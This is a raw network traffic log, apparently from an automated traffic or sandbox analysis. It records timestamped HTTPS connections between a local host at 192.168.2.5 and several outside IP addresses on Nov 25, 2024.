Nov 25, 2024 11:34:22.672530890 CET	50005	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.672548056 CET	443	50005	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.673010111 CET	50005	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.673017025 CET	443	50005	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.685561895 CET	443	50004	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.686247110 CET	443	50003	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.686357021 CET	50004	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.686368942 CET	443	50004	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.686916113 CET	50004	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.686922073 CET	443	50004	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.690362930 CET	50003	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.690376997 CET	443	50003	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.690880060 CET	50003	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.690886021 CET	443	50003	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.691437006 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.691487074 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.691553116 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.691983938 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.692002058 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.703007936 CET	443	50001	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.709333897 CET	50001	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.709345102 CET	443	50001	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.709721088 CET	50001	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.709727049 CET	443	50001	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.731759071 CET	50000	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:22.731816053 CET	443	50000	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:22.986073017 CET	443	50002	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.990397930 CET	443	50002	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.990746021 CET	50002	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.990786076 CET	50002	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.990809917 CET	443	50002	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.990824938 CET	50002	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.990830898 CET	443	50002	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.999860048 CET	50009	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:22.999890089 CET	443	50009	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:22.999969006 CET	50009	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.002630949 CET	50009	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.002644062 CET	443	50009	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.102473021 CET	443	50005	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.105459929 CET	443	50005	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.106044054 CET	50005	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.114343882 CET	50005	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.114367962 CET	443	50005	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.114377975 CET	50005	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.114383936 CET	443	50005	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.123769045 CET	50010	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.123806953 CET	443	50010	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.124058962 CET	50010	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.124274015 CET	50010	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.124289036 CET	443	50010	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.128206968 CET	443	50004	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.129414082 CET	443	50003	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.131422997 CET	443	50004	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.131486893 CET	443	50004	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.131508112 CET	50004	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.131570101 CET	50004	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.132283926 CET	443	50003	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.132467985 CET	50003	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.132617950 CET	50003	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.132638931 CET	443	50003	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.132652998 CET	50003	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.132658005 CET	443	50003	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.133799076 CET	50004	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.133816004 CET	443	50004	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.133827925 CET	50004	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.133835077 CET	443	50004	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.136590958 CET	50011	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.136617899 CET	443	50011	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.136718988 CET	50011	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.136856079 CET	50011	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.136868000 CET	443	50011	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.140671015 CET	50012	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.140706062 CET	443	50012	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.140852928 CET	50012	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.141047001 CET	50012	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.141062021 CET	443	50012	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.155637026 CET	443	50001	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.161288977 CET	443	50001	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.161569118 CET	50001	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.162024975 CET	50001	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.162029982 CET	443	50001	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.162040949 CET	50001	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.162045002 CET	443	50001	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.166028023 CET	50013	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.166050911 CET	443	50013	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.166122913 CET	50013	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.166505098 CET	50013	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:23.166516066 CET	443	50013	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:23.311197996 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.311254025 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.311310053 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.311373949 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.311429024 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.311469078 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.311512947 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.311579943 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.312042952 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.312064886 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.312079906 CET	50006	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.312087059 CET	443	50006	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.326121092 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.326138020 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.326224089 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.326428890 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.326442003 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.544342995 CET	49892	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:23.544389963 CET	443	49892	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:23.544400930 CET	49893	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:23.544420958 CET	443	49893	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:23.544449091 CET	49895	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:23.544455051 CET	443	49895	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:23.544583082 CET	49896	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:23.544600964 CET	443	49896	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:23.544635057 CET	49898	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:23.544641018 CET	443	49898	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:23.544727087 CET	49897	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:23.544764042 CET	443	49897	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:23.545164108 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:23.545185089 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:23.545254946 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:23.545484066 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:23.545495987 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:23.955224991 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.955849886 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.955867052 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.956484079 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.956487894 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:23.956517935 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:23.956525087 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:24.090396881 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:24.090536118 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:24.090946913 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:24.090958118 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:24.092606068 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:24.092609882 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:24.722121954 CET	443	50009	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.722662926 CET	50009	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:24.722678900 CET	443	50009	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.723303080 CET	50009	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:24.723308086 CET	443	50009	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.756078005 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:24.756381989 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:24.756397963 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:24.757411957 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:24.757492065 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:24.757903099 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:24.757963896 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:24.758414984 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:24.758420944 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:24.765932083 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:24.766011953 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:24.766051054 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:24.766083956 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:24.766115904 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:24.766133070 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:24.772735119 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:24.772759914 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:24.772770882 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:24.773134947 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:24.773216963 CET	443	50007	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:24.773288965 CET	50007	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:24.804853916 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:24.831387043 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:24.831412077 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:24.831486940 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:24.831715107 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:24.831731081 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:24.832532883 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:24.832556963 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:24.832571030 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:24.832602978 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:24.832631111 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:24.832639933 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:24.832696915 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:24.859520912 CET	443	50012	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.859961987 CET	50012	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:24.859972000 CET	443	50012	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.860560894 CET	50012	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:24.860565901 CET	443	50012	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.887006044 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:24.887023926 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:24.887092113 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:24.887099028 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:24.887147903 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:24.905076027 CET	443	50010	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.905400991 CET	50010	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:24.905415058 CET	443	50010	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.905802011 CET	50010	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:24.905807018 CET	443	50010	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.923897028 CET	443	50011	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.924204111 CET	50011	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:24.924217939 CET	443	50011	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:24.924578905 CET	50011	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:24.924585104 CET	443	50011	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.009212017 CET	443	50013	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.009552002 CET	50013	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.009567022 CET	443	50013	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.009974957 CET	50013	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.009979963 CET	443	50013	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.032150030 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.032210112 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.032248974 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.032259941 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.032315969 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.061182022 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.061207056 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.061278105 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.061286926 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.061305046 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.061333895 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.093583107 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.093604088 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.093673944 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.093681097 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.093738079 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.097836971 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.098494053 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.098510027 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.122951031 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.122957945 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.123004913 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.123014927 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.155364037 CET	443	50009	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.158296108 CET	443	50009	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.158355951 CET	443	50009	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.158354998 CET	50009	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.158412933 CET	50009	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.177510977 CET	50009	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.177530050 CET	443	50009	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.177542925 CET	50009	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.177548885 CET	443	50009	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.190088034 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:25.190113068 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:25.190186024 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:25.190205097 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:25.190262079 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:25.197076082 CET	50017	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.197102070 CET	443	50017	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.197180986 CET	50017	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.207243919 CET	50017	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.207258940 CET	443	50017	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.226233959 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.226257086 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.226336956 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.226346970 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.226394892 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.234054089 CET	50015	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:25.234071016 CET	443	50015	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:25.243283987 CET	50018	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:25.243305922 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:25.243388891 CET	50018	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:25.243540049 CET	50018	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:25.243550062 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:25.247720957 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.247744083 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.247823000 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.247829914 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.247883081 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.272034883 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.272057056 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.272109032 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.272114992 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.272169113 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.296458006 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.296489954 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.296555042 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.296561956 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.296616077 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.301583052 CET	443	50012	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.304713011 CET	443	50012	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.306091070 CET	50012	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.306624889 CET	50012	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.306638002 CET	443	50012	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.306648016 CET	50012	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.306653023 CET	443	50012	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.310200930 CET	50019	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.310220003 CET	443	50019	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.310290098 CET	50019	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.310507059 CET	50019	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.310518980 CET	443	50019	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.348262072 CET	443	50010	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.351509094 CET	443	50010	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.354072094 CET	50010	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.354109049 CET	50010	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.354116917 CET	443	50010	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.354126930 CET	50010	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.354131937 CET	443	50010	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.356224060 CET	50020	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.356240988 CET	443	50020	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.356302977 CET	50020	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.356405973 CET	50020	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.356420040 CET	443	50020	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.366559982 CET	443	50011	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.366622925 CET	443	50011	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.366688967 CET	50011	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.366852999 CET	50011	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.366868019 CET	443	50011	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.366878986 CET	50011	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.366883993 CET	443	50011	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.369481087 CET	50021	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.369504929 CET	443	50021	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.370064974 CET	50021	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.370189905 CET	50021	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.370199919 CET	443	50021	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.398554087 CET	443	49916	23.44.201.35	192.168.2.5
Nov 25, 2024 11:34:25.398634911 CET	443	49916	23.44.201.35	192.168.2.5
Nov 25, 2024 11:34:25.398704052 CET	49916	443	192.168.2.5	23.44.201.35
Nov 25, 2024 11:34:25.408902884 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.408936024 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.408989906 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.408998966 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.409032106 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.409058094 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.424355984 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.424376965 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.424480915 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.424489975 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.426085949 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.442246914 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.442270994 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.442328930 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.442334890 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.442375898 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.459098101 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.459122896 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.459182978 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.459188938 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.459212065 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.459230900 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.465610027 CET	443	50013	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.468961000 CET	443	50013	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.470191956 CET	50013	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.475917101 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.475940943 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.476011038 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.476020098 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.476063967 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.491544962 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.491584063 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.491628885 CET	50008	443	192.168.2.5	49.13.32.95
